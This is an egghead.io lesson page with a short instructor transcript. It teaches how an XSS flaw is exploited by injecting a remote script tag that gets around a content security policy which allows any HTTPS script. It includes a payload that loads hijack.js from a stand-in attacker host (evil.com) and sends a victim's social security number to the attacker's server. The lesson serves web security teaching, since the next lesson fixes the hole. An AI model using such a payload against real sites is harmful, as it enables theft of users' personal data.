Read Document Content from a Vulnerable Website via Script Tag Injection in an XSS Payload
In this lesson, you will learn how to exploit an XSS vulnerability to read the contents of the page body from a vulnerable site, this time by loading up a script from their attacking domain instead of inlining the javascript, using an attack known as Remote Script Tag Injection. This attack will succeed because in the previous lesson, we only blocked inline scripts from executing. We'll solve this problem in our next lesson!
Instructor: [00:00] Now that we mitigated XSS via inline script injection, let's put our attacker hat back on. If we inspect the content security policy of the site, we see that it allows scripts from self and from HTTPS.
[00:12] We could take our malicious payload, strip the script tags and save this as a new file. Let's call it hijack.js. This file will now be available for download.
[00:33] If we logged back in to our site and we've put into the message box script source = https://evil.com:666/hijack.js and hit submit, we see that hijack.js gets included, which will create the image and cause our hijacked payload to be submitted.
[01:01] You can verify that the server has received the user's social security number again, thereby completing the XSS attack via a technique known as remote script inclusion.
Member comments are a way for members to communicate, interact, and ask questions about a lesson.
The instructor or someone from the community might respond to your question Here are a few basic guidelines to commenting on egghead.io
Be on-Topic
Comments are for discussing a lesson. If you're having a general issue with the website functionality, please contact us at support@egghead.io.
Avoid meta-discussion
Code Problems?
Should be accompanied by code! Codesandbox or Stackblitz provide a way to share code and discuss it in context
Details and Context
Vague question? Vague answer. Any details and context you can provide will lure more interesting answers!